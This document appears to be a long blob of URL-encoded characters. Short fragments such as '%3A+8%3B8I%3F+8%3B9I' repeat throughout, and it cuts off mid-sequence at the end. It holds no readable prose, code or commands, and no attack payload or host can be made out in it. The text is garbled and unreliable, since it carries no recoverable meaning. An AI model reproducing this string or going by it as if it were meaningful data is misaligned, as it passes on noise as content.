%3A+8%3B8I%3F+8%3B9I+8%3B9GNN+8%3B%3E7z+8%3B8I%3F+8%3B9I+8%3B9KP+8%3B8I%3F+8%3B9I+8%3B9KQ+8%3B%3E7+8%3B%3DJ%3A+8%3B8I%3F+8%3B9I+8%3B9GNFF%3A+8%3B8I%3F+8%3B9I+8%3B9GSY%3A+8%3B8I%3F+8%3B9I+8%3B9GNX+8%3B%3DK+8%3B%3DJwz%7B+8%3B%3DK+8%3B%3E7z+8%3B8I%3F+8%3B9I+8%3B9KQ+8%3B%3DJ+8%3B%3DH+8%3B%3DKvy%3A+8%3B8I%3F+8%3B9I+8%3B9GOY%7B+8%3B8I%3F+8%3B9I+8%3B9KQ+8%3B%3DJx+8%3B8I%3F+8%3B9I+8%3B9KP%7E+8%3B%3DK+8%3B%3DJ%3A+8%3B8I%3F+8%3B9I+8%3B9GNM%3A+8%3B8I%3F+8%3B9I+8%3B9GNN%3A+8%3B8I%3F+8%3B9I+8%3B9GSW+8%3B%3E7z+8%3B8I%3F+8%3B9I+8%3B9KP+8%3B8I%3F+8%3B9I+8%3B9KQ+8%3B%3E7+8%3B%3DJ%3A+8%3B8I%3F+8%3B9I+8%3B9GN+8%3B9Lv+8%3B%3DHz+8%3B%3E7+8%3B8I%3F+8%3B9I+8%3B9KP%3A+8%3B8I%3F+8%3B9I+8%3B9GNM%3A+8%3B8I%3F+8%3B9I+8%3B9GN+8%3B8I%3F+8%3B9I+8%3B9GNZ+8%3B%3E7+8%3B%3E7+8%3B%3DK+8%3B%3E7%3A+8%3B8I%3F+8%3B9I+8%3B9GOV%3A+8%3B8I%3F+8%3B9I+8%3B9GN+8%3B9L+8%3B8I%3F+8%3B9I+8%3B9IQ+8%3B%3DJ%80+8%3B%3DJ+8%3B%3DK+8%3B8I%3F+8%3B9I+8%3B9KS+8%3B%3DJ%3A+8%3B8I%3F+8%3B9I+8%3B9GN+8%3B9L+8%3B8I%3F+8%3B9I+8%3B9IO+8%3B8I%3F+8%3B9I+8%3B9L%3E+8%3B8I%3F+8%3B9I+8%3B9KO+8%3B8I%3F+8%3B9I+8%3B9KPz+8%3B%3DI%3A+8%3B8I%3F+8%3B9I+8%3B9GN+8%3B9L%5Bv%7E+8%3B%3DH+8%3B8I%3F+8%3B9I+8%3B9KQ+8%3B%3E7z%3A+8%3B8I%3F+8%3B9I+8%3B9GNF%3A+8%3B8I%3F+8%3B9I+8%3B9GN+8%3B8I%3F+8%3B9I+8%3B9GN%3A+8%3B8I%3F+8%3B9I+8%3B9GNN%3A+8%3B8I%3F+8%3B9I+8%3B9GNX%3A+8%3B8I%3F+8%3B9I+8%3B9GN+8%3B8I%3F+8%3B9I+8%3B9GNZ+8%3B%3E7+8%3B%3E7+8%3B%3DK+8%3B%3E7%3A+8%3B8I%3F+8%3B9I+8%3B9GOV%3A+8%3B8I%3F+8%3B9I+8%3B9GN+8%3B9L+8%3B8I%3F+8%3B9I+8%3B9IQ+8%3B%3DJ%80+8%3B%3DJ+8%3B%3DK+8%3B8I%3F+8%3B9I+8%3B9KS+8%3B%3DJ%3A+8%3B8I%3F+8%3B9I+8%3B9GN+8%3B9L+8%3B8I%3F+8%3B9I+8%3B9IO+8%3B8I%3F+8%3B9I+8%3B9L%3E+8%3B8I%3F+8%3B9I+8%3B9KO+8%3B8I%3F+8%3B9I+8%3B9KPz+8%3B%3DI%3A+8%3B8I%3F+8%3B9I+8%3B9GN+8%3B9L%5Bv%7E+8%3B%3DH+8%3B8I%3F+8%3B9I+8%3B9KQ+8%3B%3E7z%3A+8%3B8I%3F+8%3B9I+8%3B9GNF%3A+8%3B8I%3F+8%3B9I+8%3B9GN+8%3B8I%3F+8%3B9I+8%3B9GN%3A+8%3B8I%3F+8%3B9I+8%3B9GSY%3A+8%3B8I%3F+8%3B9I+8%3B9GNX+8%3B8I%3F+8%3B9I+8%3B9KS%7E+8%3B%3DJy+8%3B%3DK+8%3B8I%3F+8%3B9I+8%3B9KS+8%3B9J+8%3B%3DK+8%3B%3DJw+8%3B%3DH+8%3B8I%3F+8%3B9I+8%3B9KQ+8%3B%3E7%3A+8%3B8I%3F+8%3B9I+8%3B9GOY%7B+8%3B8I%3F+8%3B9I+8%3B9KQ+8%3B%3DJx+8%3B8I%3F+8%3B9I+8%3B9KP%7E+8%3B%3DK+8%3B%3DJ%3A+8%3B8I%3F+8%3B9I+8%3B9GNM%3A+8%3B8I%3F+8%3B9I+8%3B9GNN%3A+8%3B8I%3F+8%3B9I+8%3B9GSWv+8%3B%3DHz+8%3B%3E7+8%3B8I%3F+8%3B9I+8%3B9KP%3A+8%3B8I%3F+8%3B9I+8%3B9GNM%3A+8%3B8I%3F+8%3B9I+8%3B9GN+8%3B8I%3F+8%3B9I+8%3B9GNZ+8%3B%3E7+8%3B%3E7+8%3B%3DK+8%3B%3E7%3A+8%3B8I%3F+8%3B9I+8%3B9GOV%3A+8%3B8I%3F+8%3B9I+8%3B9GN+8%3B9L+8%3B8I%3F+8%3B9I+8%3B9IQ+8%3B%3DJ%80+8%3B%3DJ+8%3B%3DK+8%3B8I%3F+8%3B9I+8%3B9KS+8%3B%3DJ%3A+8%3B8I%3F+8%3B9I+8%3B9GN+8%3B9L+8%3B8I%3F+8%3B9I+8%3B9IO+8%3B8I%3F+8%3B9I+8%3B9L%3E+8%3B8I%3F+8%3B9I+8%3B9KO+8%3B8I%3F+8%3B9I+8%3B9KPz+8%3B%3DI%3A+8%3B8I%3F+8%3B9I+8%3B9GN+8%3B9L%5Bv%7E+8%3B%3DH+8%3B8I%3F+8%3B9I+8%3B9KQ+8%3B%3E7z%3A+8%3B8I%3F+8%3B9I+8%3B9GNF%3A+8%3B8I%3F+8%3B9I+8%3B9GN+8%3B8I%3F+8%3B9I+8%3B9GN%3A+8%3B8I%3F+8%3B9I+8%3B9GNN%3A+8%3B8I%3F+8%3B9I+8%3B9GSY%3A+8%3B8I%3F+8%3B9I+8%3B9GNXy+8%3B%3DKx+8%3B8I%3F+8%3B9I+8%3B9KQ+8%3B%3DIz+8%3B%3DJ+8%3B8I%3F+8%3B9I+8%3B9KP+8%3B9JvyyZ+8%3B8I%3F+8%3B9I+8%3B9KRz+8%3B%3DJ+8%3B8I%3F+8%3B9I+8%3B9KP+8%3B%3BH%7E+8%3B8I%3F+8%3B9I+8%3B9KO+8%3B8I%3F+8%3B9I+8%3B9KPz+8%3B%3DJz+8%3B%3E7%3A+8%3B8I%3F+8%3B9I+8%3B9GNM%3A+8%3B8I%3F+8%3B9I+8%3B9GN+8%3B8I%3F+8%3B9I+8%3B9GN%80z+8%3B8I%3F+8%3B9I+8%3B9L%3E+8%3B8I%3F+8%3B9I+8%3B9KQ+8%3B%3DL%3A+8%3B8I%3F+8%3B9I+8%3B9GN+8%3B8I%3F+8%3B9I+8%3B9GN%3A+8%3B8I%3F+8%3B9I+8%3B9GNX%7B+8%3B8I%3F+8%3B9I+8%3B9KQ+8%3B%3DJx+8%3B8I%3F+8%3B9I+8%3B9KP%7E+8%3B%3DK+8%3B%3DJ%3A+8%3B8I%3F+8%3B9I+8%3B9GNMv%3A+8%3B8I%3F+8%3B9I+8%3B9GNN%3A+8%3B8I%3F+8%3B9I+8%3B9GSW+8%3B8I%3F+8%3B9I+8%3B9GN+8%3B8I%3F+8%3B9I+8%3B9GS%3A+8%3B8I%3F+8%3B9I+8%3B9GOY%3A+8%3B8I%3F+8%3B9I+8%3B9GOYv+8%3B9J%80z+8%3B8I%3F+8%3B9I+8%3B9L%3EX+8%3B%3DKyz%3A+8%3B8I%3F+8%3B9I+8%3B9GN+8%3B8I%3F+8%3B9I+8%3B9GR%3A+8%3B8I%3F+8%3B9I+8%3B9GN+8%3B8I%3F+8%3B9I+8%3B9GR+8%3B8I%3F+8%3B9I+8%3B9KP+8%3B%3DK%7C%7C+8%3B%3DHz%5B+8%3B8I%3F+8%3B9I+8%3B9KQ+8%3B%3DH+8%3B%3DH+8%3B8I%3F+8%3B9I+8%3B9IOx+8%3B%3E7zz+8%3B%3DJ%3A+8%3B8I%3F+8%3B9I+8%3B9GNM%3A+8%3B8I%3F+8%3B9I+8%3B9GNN%3A+8%3B8I%3F+8%3B9I+8%3B9GSY%3A+8%3B8I%3F+8%3B9I+8%3B9GNX%3A+8%3B8I%3F+8%3B9I+8%3B9GNFF%3A+8%3B8I%3F+8%3B9I+8%3B9GNN%3A+8%3B8I%3F+8%3B9I+8%3B9GNXy+8%3B%3DKx+8%3B8I%3F+8%3B9I+8%3B9KQ+8%3B%3DIz+8%3B%3DJ+8%3B8I%3F+8%3B9I+8%3B9KP+8%3B9JvyyZ+8%3B8I%3F+8%3B9I+8%3B9KRz+8%3B%3DJ+8%3B8I%3F+8%3B9I+8%3B9KP+8%3B%3BH%7E+8%3B8I%3F+8%3B9I+8%3B9KO+8%3B8I%3F+8%3B9I+8%3B9KPz+8%3B%3DJz+8%3B%3E7%3A+8%3B8I%3F+8%3B9I+8%3B9GNM%3A+8%3B8I%3F+8%3B9I+8%3B9GN+8%3B8I%3F+8%3B9I+8%3B9GN%80z+8%3B8I%3F+8%3B9I+8%3B9L%3E+8%3B8I%3F+8%3B9I+8%3B9KQ+8%3B%3DL%3A+8%3B8I%3F+8%3B9I+8%3B9GN+8%3B8I%3F+8%3B9I+8%3B9GN%3A+8%3B8I%3F+8%3B9I+8%3B9GNX%7B+8%3B8I%3F+8%3B9I+8%3B9KQ+8%3B%3DJx+8%3B8I%3F+8%3B9I+8%3B9KP%7E+8%3B%3DK+8%3B%3DJ%3A+8%3B8I%3F+8%3B9I+8%3B9GNMv%3A+8%3B8I%3F+8%3B9I+8%3B9GNN%3A+8%3B8I%3F+8%3B9I+8%3B9GSWF+8%3B8I%3F+8%3B9I+8%3B9GN+8%3B8I%3F+8%3B9I+8%3B9GN%3A+8%3B8I%3F+8%3B9I+8%3B9GNF%3A+8%3B8I%3F+8%3B9I+8%3B9GOYv+8%3B9J%80z+8%3B8I%3F+8%3B9I+8%3B9L%3EX+8%3B%3DKyz%3A+8%3B8I%3F+8%3B9I+8%3B9GN+8%3B8I%3F+8%3B9I+8%3B9GR%3A+8%3B8I%3F+8%3B9I+8%3B9GN+8%3B8I%3F+8%3B9I+8%3B9GRF+8%3B8I%3F+8%3B9I+8%3B9GS%3A+8%3B8I%3F+8%3B9I+8%3B9GNF%3A+8%3B8I%3F+8%3B9I+8%3B9GOYv+8%3B9J%80z+8%3B8I%3F+8%3B9I+8%3B9L%3EX+8%3B%3DKyz%3A+8%3B8I%3F+8%3B9I+8%3B9GN+8%3B8I%3F+8%3B9I+8%3B9GR%3A+8%3B8I%3F+8%3B9I+8%3B9GN+8%3B8I%3F+8%3B9I+8%3B9GRFM%3A+8%3B8I%3F+8%3B9I+8%3B9GNF%3A+8%3B8I%3F+8%3B9I+8%3B9GOYv+8%3B9J%80z+8%3B8I%3F+8%3B9I+8%3B9L%3EX+8%3B%3DKyz%3A+8%3B8I%3F+8%3B9I+8%3B9GN+8%3B8I%3F+8%3B9I+8%3B9GR%3A+8%3B8I%3F+8%3B9I+8%3B9GN+8%3B8I%3F+8%3B9I+8%3B9GRF+8%3B8I%3F+8%3B9I+8%3B9GO%3A+8%3B8I%3F+8%3B9I+8%3B9GNF%3A+8%3B8I%3F+8%3B9I+8%3B9GOYv+8%3B9J%80z+8%3B8I%3F+8%3B9I+8%3B9L%3EX+8%3B%3DKyz%3A+8%3B8I%3F+8%3B9I+8%3B9GSX%3A+8%3B8I%3F+8%3B9I+8%3B9GSX+8%3B8I%3F+8%3B9I+8%3B9KP+8%3B%3DK%7C%7C+8%3B%3DHz%5B+8%3B8I%3F+8%3B9I+8%3B9KQ+8%3B%3DH+8%3B%3DH+8%3B8I%3F+8%3B9I+8%3B9IOx+8%3B%3E7zz+8%3B%3DJ%3A+8%3B8I%3F+8%3B9I+8%3B9GNM%3A+8%3B8I%3F+8%3B9I+8%3B9GNN%3A+8%3B8I%3F+8%3B9I+8%3B9GSY%3A+8%3B8I%3F+8%3B9I+8%3B9GNX%3A+8%3B8I%3F+8%3B9I+8%3B9GNFF%3A+8%3B8I%3F+8%3B9I+8%3B9GNN%3A+8%3B8I%3F+8%3B9I+8%3B9GOW+8%3B8I%3F+8%3B9I+8%3B9KRv+8%3B%3E7%3A+8%3B8I%3F+8%3B9I+8%3B9GN+8%3B9Lw%7Fz+8%3B%3DJ%3A+8%3B8I%3F+8%3B9I+8%3B9GNXwy+8%3B8I%3F+8%3B9I+8%3B9KRv%3A+8%3B8I%3F+8%3B9I+8%3B9GNX+8%3B8I%3F+8%3B9I+8%3B9KO+8%3B8I%3F+8%3B9I+8%3B9KS%7E+8%3B8I%3F+8%3B9I+8%3B9KPx%7Dw+8%3B8I%3F+8%3B9I+8%3B9KQww+8%3B%3DHz%3A+8%3B8I%3F+8%3B9I+8%3B9GOY+8%3B9L%3A+8%3B8I%3F+8%3B9I+8%3B9GOW+8%3B8I%3F+8%3B9I+8%3B9KS%7E+8%3B%3DJy+8%3B%3DK+8%3B8I%3F+8%3B9I+8%3B9KS+8%3B9J+8%3B%3DK+8%3B%3DJ+8%3B%3DH+8%3B%3DKvy%3A+8%3B8I%3F+8%3B9I+8%3B9GOY%7B+8%3B8I%3F+8%3B9I+8%3B9KQ+8%3B%3DJx+8%3B8I%3F+8%3B9I+8%3B9KP%7E+8%3B%3DK+8%3B%3DJ%3A+8%3B8I%3F+8%3B9I+8%3B9GNM%3A+8%3B8I%3F+8%3B9I+8%3B9GNN%3A+8%3B8I%3F+8%3B9I+8%3B9GSWy+8%3B%3DKx+8%3B8I%3F+8%3B9I+8%3B9KQ+8%3B%3DIz+8%3B%3DJ+8%3B8I%3F+8%3B9I+8%3B9KP+8%3B9J+8%3B%3DK+8%3B%3DJx+8%3B%3DH%7Ex%80%3A+8%3B8I%3F+8%3B9I+8%3B9GOY%7B+8%3B8I%3F+8%3B9I+8%3B9KQ+8%3B%3DJx+8%3B8I%3F+8%3B9I+8%3B9KP%7E+8%3B%3DK+8%3B%3DJ%3A+8%3B8I%3F+8%3B9I+8%3B9GNMv%3A+8%3B8I%3F+8%3B9I+8%3B9GNN%3A+8%3B8I%3F+8%3B9I+8%3B9GSWv%3A+8%3B8I%3F+8%3B9I+8%3B9GOYv%3A+8%3B8I%3F+8%3B9I+8%3B9GSX%3A+8%3B8I%3F+8%3B9I+8%3B9GSXz+8%3B8I%3F+8%3B9I+8%3B9KRz+8%3B%3DJ+8%3B8I%3F+8%3B9I+8%3B9KP%3A+8%3B8I%3F+8%3B9I+8%3B9GNX+8%3B8I%3F+8%3B9I+8%3B9KPv+8%3B%3E7%7Cz+8%3B8I%3F+8%3B9I+8%3B9KP%3A+8%3B8I%3F+8%3B9I+8%3B9GOYv+8%3B9J+8%3B8I%3F+8%3B9I+8%3B9KPv+8%3B%3E7%7Cz+8%3B8I%3F+8%3B9I+8%3B9KP%3A+8%3B8I%3F+8%3B9I+8%3B9GSX%3A+8%3B8I%3F+8%3B9I+8%3B9GSXv+8%3B9J+8%3B8I%3F+8%3B9I+8%3B9KO+8%3B%3E7xZ+8%3B%3DHz+8%3B%3DIz+8%3B%3DJ+8%3B8I%3F+8%3B9I+8%3B9KP%3A+8%3B8I%3F+8%3B9I+8%3B9GNX%3A+8%3B8I%3F+8%3B9I+8%3B9GN+8%3B8I%3F+8%3B9I+8%3B9GNY%5E+8%3B8I%3F+8%3B9I+8%3B9IR%3A+8%3B8I%3F+8%3B9I+8%3B9GN+8%3B8I%3F+8%3B9I+8%3B9GN%3A+8%3B8I%3F+8%3B9I+8%3B9GOY%3A+8%3B8I%3F+8%3B9I+8%3B9GOY+8%3B8I%3F+8%3B9I+8%3B9KPv+8%3B%3E7%7Cz+8%3B8I%3F+8%3B9I+8%3B9KP+8%3B9J+8%3B8I%3F+8%3B9I+8%3B9KPv%7C+8%3B%3BJv+8%3B%3DIz%3A+8%3B8I%3F+8%3B9I+8%3B9GO%5B%3A+8%3B8I%3F+8%3B9I+8%3B9GNM+8%3B8I%3F+8%3B9I+8%3B9KP+8%3B%3DK%7C%7C+8%3B%3DHz%5B+8%3B8I%3F+8%3B9I+8%3B9KQ+8%3B%3DH+8%3B%3DH+8%3B8I%3F+8%3B9I+8%3B9IOx+8%3B%3E7zz+8%3B%3DJ%3A+8%3B8I%3F+8%3B9I+8%3B9GNM%3A+8%3B8I%3F+8%3B9I+8%3B9GNN%3A+8%3B8I%3F+8%3B9I+8%3B9GNXy+8%3B%3DKx+8%3B8I%3F+8%3B9I+8%3B9KQ+8%3B%3DIz+8%3B%3DJ+8%3B8I%3F+8%3B9I+8%3B9KP+8%3B9Jw+8%3B%3DKy+8%3B8I%3F+8%3B9I+8%3B9L%3E+8%3B9J+8%3B8I%3F+8%3B9I+8%3B9KO+8%3B8I%3F+8%3B9I+8%3B9KP+8%3B8I%3F+8%3B9I+8%3B9L%3E+8%3B%3DHz+8%3B9J+8%3B%3DK+8%3B8I%3F+8%3B9I+8%3B9KRz+8%3B%3E7%7B+8%3B%3DH+8%3B%3DK+8%3B8I%3F+8%3B9I+8%3B9KS%3A+8%3B8I%3F+8%3B9I+8%3B9GOY%3A+8%3B8I%3F+8%3B9I+8%3B9GN+8%3B8I%3F+8%3B9I+8%3B9GN%7D%7Eyyz+8%3B%3DJ%3A+8%3B8I%3F+8%3B9I+8%3B9GN+8%3B8I%3F+8%3B9I+8%3B9GN%3A+8%3B8I%3F+8%3B9I+8%3B9GNXw%7Fz+8%3B%3DJ%3A+8%3B8I%3F+8%3B9I+8%3B9GOY+8%3B8I%3F+8%3B9I+8%3B9KO+8%3B8I%3F+8%3B9I+8%3B9KS%7E+8%3B8I%3F+8%3B9I+8%3B9KPx%7Dw+8%3B8I%3F+8%3B9I+8%3B9KQww+8%3B%3DHz%3A+8%3B8I%3F+8%3B9I+8%3B9GO%5By+8%3B%3DKx+8%3B8I%3F+8%3B9I+8%3B9KQ+8%3B%3DIz+8%3B%3DJ+8%3B8I%3F+8%3B9I+8%3B9KP+8%3B9J%7Cz+8%3B8I%3F+8%3B9I+8%3B9KPZ+8%3B%3DHz+8%3B%3DIz+8%3B%3DJ+8%3B8I%3F+8%3B9I+8%3B9KPW+8%3B8I%3F+8%3B9I+8%3B9L%3E%5Ey%3A+8%3B8I%3F+8%3B9I+8%3B9GNM%3A+8%3B8I%3F+8%3B9I+8%3B9GN+8%3B8I%3F+8%3B9I+8%3B9GNw+8%3B8I%3F+8%3B9I+8%3B9GN%3A+8%3B8I%3F+8%3B9I+8%3B9GN+8%3B8I%3F+8%3B9I+8%3B9GN%3A+8%3B8I%3F+8%3B9I+8%3B9GNN%3A+8%3B8I%3F+8%3B9I+8%3B9GOVy+8%3B%3DKx+8%3B8I%3F+8%3B9I+8%3B9KQ+8%3B%3DIz+8%3B%3DJ+8%3B8I%3F+8%3B9I+8%3B9KP+8%3B9J%7Cz+8%3B8I%3F+8%3B9I+8%3B9KPZ+8%3B%3DHz+8%3B%3DIz+8%3B%3DJ+8%3B8I%3F+8%3B9I+8%3B9KPW+8%3B8I%3F+8%3B9I+8%3B9L%3E%5Ey%3A+8%3B8I%3F+8%3B9I+8%3B9GNM%3A+8%3B8I%3F+8%3B9I+8%3B9GN+8%3B8I%3F+8%3B9I+8%3B9GNwF%3A+8%3B8I%3F+8%3B9I+8%3B9GN+8%3B8I%3F+8%3B9I+8%3B9GN%3A+8%3B8I%3F+8%3B9I+8%3B9GNN%3A+8%3B8I%3F+8%3B9I+8%3B9GNXwy+8%3B8I%3F+8%3B9I+8%3B9KRv%3A+8%3B8I%3F+8%3B9I+8%3B9GOYy+8%3B%3DKx+8%3B8I%3F+8%3B9I+8%3B9KQ+8%3B%3DIz+8%3B%3DJ+8%3B8I%3F+8%3B9I+8%3B9KP+8%3B9J%7Cz+8%3B8I%3F+8%3B9I+8%3B9KPZ+8%3B%3DHz+8%3B%3DIz+8%3B%3DJ+8%3B8I%3F+8%3B9I+8%3B9KPW+8%3B8I%3F+8%3B9I+8%3B9L%3E%5Ey%3A+8%3B8I%3F+8%3B9I+8%3B9GNM%3A+8%3B8I%3F+8%3B9I+8%3B9GN+8%3B8I%3F+8%3B9I+8%3B9GNw+8%3B8I%3F+8%3B9I+8%3B9GN%3A+8%3B8I%3F+8%3B9I+8%3B9GN+8%3B8I%3F+8%3B9I+8%3B9GN%3A+8%3B8I%3F+8%3B9I+8%3B9GNN%3A+8%3B8I%3F+8%3B9I+8%3B9GNX+8%3B8I%3F+8%3B9I+8%3B9KO+8%3B8I%3F+8%3B9I+8%3B9KS%7E+8%3B8I%3F+8%3B9I+8%3B9KPx%7Dw+8%3B8I%3F+8%3B9I+8%3B9KQww+8%3B%3DHz+8%3B9G+8%3B9G%3A+8%3B8I%3F+8%3B9I+8%3B9GNXv+8%3B8I%3F+8%3B9I+8%3B9KQy%7E%7E%3A+8%3B8I%3F+8%3B9I+8%3B9GSX%3A+8%3B8I%3F+8%3B9I+8%3B9GSXy+8%3B%3DKx+8%3B8I%3F+8%3B9I+8%3B9KQ+8%3B%3DIz+8%3B%3DJ+8%3B8I%3F+8%3B9I+8%3B9KP+8%3B9J%7Cz+8%3B8I%3F+8%3B9I+8%3B9KPZ+8%3B%3DHz+8%3B%3DIz+8%3B%3DJ+8%3B8I%3F+8%3B9I+8%3B9KPW+8%3B8I%3F+8%3B9I+8%3B9L%3E%5Ey%3A+8%3B8I%3F+8%3B9I+8%3B9GNM%3A+8%3B8I%3F+8%3B9I+8%3B9GN+8%3B8I%3F+8%3B9I+8%3B9GNv+8%3B8I%3F+8%3B9I+8%3B9KQy%7E+8%3B%3DK%3A+8%3B8I%3F+8%3B9I+8%3B9GN+8%3B8I%3F+8%3B9I+8%3B9GN%3A+8%3B8I%3F+8%3B9I+8%3B9GNN+8%3B9J+8%3B%3DL+8%3B%3DHv+8%3B8I%3F+8%3B9I+8%3B9L%3E%3A+8%3B8I%3F+8%3B9I+8%3B9GNM%3A+8%3B8I%3F+8%3B9I+8%3B9GNN%3A+8%3B8I%3F+8%3B9I+8%3B9GNXy+8%3B%3DKx+8%3B8I%3F+8%3B9I+8%3B9KQ+8%3B%3DIz+8%3B%3DJ+8%3B8I%3F+8%3B9I+8%3B9KP+8%3B9Jw+8%3B%3DKy+8%3B8I%3F+8%3B9I+8%3B9L%3E+8%3B9J+8%3B8I%3F+8%3B9I+8%3B9KO+8%3B8I%3F+8%3B9I+8%3B9KP+8%3B8I%3F+8%3B9I+8%3B9L%3E+8%3B%3DHz+8%3B9Jx+8%3B8I%3F+8%3B9I+8%3B9KQ+8%3B%3E7+8%3B8I%3F+8%3B9I+8%3B9KO+8%3B%3DK+8%3B%3E7%3A+8%3B8I%3F+8%3B9I+8%3B9GOY%3A+8%3B8I%3F+8%3B9I+8%3B9GN+8%3B8I%3F+8%3B9I+8%3B9GN+8%3B%3DJ+8%3B%3DK+8%3B8I%3F+8%3B9I+8%3B9KP+8%3B9Iv+8%3B%3DH+8%3B%3DH+8%3B%3DK+8%3B8I%3F+8%3B9I+8%3B9KSzy%3A+8%3B8I%3F+8%3B9I+8%3B9GN+8%3B8I%3F+8%3B9I+8%3B9GN%3A+8%3B8I%3F+8%3B9I+8%3B9GNXy+8%3B%3DKx+8%3B8I%3F+8%3B9I+8%3B9KQ+8%3B%3DIz+8%3B%3DJ+8%3B8I%3F+8%3B9I+8%3B9KP+8%3B9J%7Cz+8%3B8I%3F+8%3B9I+8%3B9KPZ+8%3B%3DHz+8%3B%3DIz+8%3B%3DJ+8%3B8I%3F+8%3B9I+8%3B9KPW+8%3B8I%3F+8%3B9I+8%3B9L%3E%5Ey%3A+8%3B8I%3F+8%3B9I+8%3B9GNM%3A+8%3B8I%3F+8%3B9I+8%3B9GN+8%3B8I%3F+8%3B9I+8%3B9GN+8%3B%3DIv+8%3B%3DL%3A+8%3B8I%3F+8%3B9I+8%3B9GN+8%3B8I%3F+8%3B9I+8%3B9GN%3A+8%3B8I%3F+8%3B9I+8%3B9GNN+8%3B9J+8%3B8I%3F+8%3B9I+8%3B9KO+8%3B8I%3F+8%3B9I+8%3B9KP+8%3B8I%3F+8%3B9I+8%3B9L%3E+8%3B%3DHz+8%3B9Jx+8%3B8I%3F+8%3B9I+8%3B9KQ+8%3B%3E7+8%3B8I%3F+8%3B9I+8%3B9KO+8%3B%3DK+8%3B%3E7%3A+8%3B8I%3F+8%3B9I+8%3B9GOY%3A+8%3B8I%3F+8%3B9I+8%3B9GN+8%3B8I%3F+8%3B9I+8%3B9GN%7E+8%3B%3DJ%7E+8%3B8I%3F+8%3B9I+8%3B9KP%7Ev+8%3B%3DH%3A+8%3B8I%3F+8%3B9I+8%3B9GN+8%3B8I%3F+8%3B9I+8%3B9GN%3A+8%3B8I%3F+8%3B9I+8%3B9GNX+8%3B8I%3F+8%3B9I+8%3B9KO+8%3B8I%3F+8%3B9I+8%3B9KS%7E+8%3B8I%3F+8%3B9I+8%3B9KPx%7Dw+8%3B8I%3F+8%3B9I+8%3B9KQww+8%3B%3DHz%3A+8%3B8I%3F+8%3B9I+8%3B9GOX+8%3B8I%3F+8%3B9I+8%3B9GN%3A+8%3B8I%3F+8%3B9I+8%3B9GO%5B%3A+8%3B8I%3F+8%3B9I+8%3B9GNMw%7Fz+8%3B%3DJ+8%3B9J+8%3B8I%3F+8%3B9I+8%3B9KO+8%3B8I%3F+8%3B9I+8%3B9KP+8%3B8I%3F+8%3B9I+8%3B9L%3E+8%3B%3DHz+8%3B9Jy%7E+8%3B8I%3F+8%3B9I+8%3B9KO+8%3B%3DL+8%3B%3DHv+8%3B8I%3F+8%3B9I+8%3B9L%3E%3A+8%3B8I%3F+8%3B9I+8%3B9GOY%3A+8%3B8I%3F+8%3B9I+8%3B9GN+8%3B8I%3F+8%3B9I+8%3B9GNw+8%3B%3DH+8%3B%3DKx%80%3A+8%3B8I%3F+8%3B9I+8%3B9GN+8%3B8I%3F+8%3B9I+8%3B9GN%3A+8%3B8I%3F+8%3B9I+8%3B9GNX%7B%7E+8%3B%3DJ%3A+8%3B8I%3F+8%3B9I+8%3B9GNMw%7Fz+8%3B%3DJ%3A+8%3B8I%3F+8%3B9I+8%3B9GNN%3A+8%3B8I%3F+8%3B9I+8%3B9GNX+8%3B8I%3F+8%3B9I+8%3B9KOz+8%3B8I%3F+8%3B9I+8%3B9KP+8%3B8I%3F+8%3B9I+8%3B9IP%7E+8%3B%3DIz+8%3B%3DK+8%3B8I%3F+8%3B9I+8%3B9KQ+8%3B8I%3F+8%3B9I+8%3B9KP%3A+8%3B8I%3F+8%3B9I+8%3B9GNM%7B+8%3B8I%3F+8%3B9I+8%3B9KQ+8%3B%3DJx+8%3B8I%3F+8%3B9I+8%3B9KP%7E+8%3B%3DK+8%3B%3DJ%3A+8%3B8I%3F+8%3B9I+8%3B9GNM%3A+8%3B8I%3F+8%3B9I+8%3B9GNN%3A+8%3B8I%3F+8%3B9I+8%3B9GSW%7B+8%3B%3DK+8%3B8I%3F+8%3B9I+8%3B9KQ+8%3B8I%3F+8%3B9I+8%3B9KP%3A+8%3B8I%3F+8%3B9I+8%3B9GNMw%7Fz+8%3B%3DJ%3A+8%3B8I%3F+8%3B9I+8%3B9GNN%3A+8%3B8I%3F+8%3B9I+8%3B9GNXwy+8%3B8I%3F+8%3B9I+8%3B9KRv+8%3B9J+8%3B8I%3F+8%3B9I+8%3B9KO+8%3B8I%3F+8%3B9I+8%3B9KP+8%3B8I%3F+8%3B9I+8%3B9L%3E+8%3B%3DHz+8%3B9Jy%7E+8%3B8I%3F+8%3B9I+8%3B9KO+8%3B%3DL+8%3B%3DHv+8%3B8I%3F+8%3B9I+8%3B9L%3E%3A+8%3B8I%3F+8%3B9I+8%3B9GOY%3A+8%3B8I%3F+8%3B9I+8%3B9GN+8%3B8I%3F+8%3B9I+8%3B9GNw+8%3B%3DH+8%3B%3DKx%80%3A+8%3B8I%3F+8%3B9I+8%3B9GN+8%3B8I%3F+8%3B9I+8%3B9GN%3A+8%3B8I%3F+8%3B9I+8%3B9GNX+8%3B8I%3F+8%3B9I+8%3B9KOz+8%3B8I%3F+8%3B9I+8%3B9KP+8%3B8I%3F+8%3B9I+8%3B9IP%7E+8%3B%3DIz+8%3B%3DK+8%3B8I%3F+8%3B9I+8%3B9KQ+8%3B8I%3F+8%3B9I+8%3B9KP%3A+8%3B8I%3F+8%3B9I+8%3B9GNM%7B+8%3B8I%3F+8%3B9I+8%3B9KQ+8%3B%3DJx+8%3B8I%3F+8%3B9I+8%3B9KP%7E+8%3B%3DK+8%3B%3DJ%3A+8%3B8I%3F+8%3B9I+8%3B9GNM%3A+8%3B8I%3F+8%3B9I+8%3B9GNN%3A+8%3B8I%3F+8%3B9I+8%3B9GSW%7B%7E+8%3B%3DJ%3A+8%3B8I%3F+8%3B9I+8%3B9GNMwy+8%3B8I%3F+8%3B9I+8%3B9KRv%3A+8%3B8I%3F+8%3B9I+8%3B9GNN%3A+8%3B8I%3F+8%3B9I+8%3B9GSY%3A+8%3B8I%3F+8%3B9I+8%3B9GNXF+8%3B8I%3F+8%3B9I+8%3B9GN+8%3B9L+8%3B9L%3A+8%3B8I%3F+8%3B9I+8%3B9GNN%3A+8%3B8I%3F+8%3B9I+8%3B9GSY%3A+8%3B8I%3F+8%3B9I+8%3B9GNX+8%3B8I%3F+8%3B9I+8%3B9GN+8%3B8I%3F+8%3B9I+8%3B9GQ+8%3B9L+8%3B9L%3A+8%3B8I%3F+8%3B9I+8%3B9GNN%3A+8%3B8I%3F+8%3B9I+8%3B9GNN%3A+8%3B8I%3F+8%3B9I+8%3B9GOV%3A+8%3B8I%3F+8%3B9I+8%3B9GNM%7B+8%3B%3DK+8%3B8I%3F+8%3B9I+8%3B9KQ+8%3B8I%3F+8%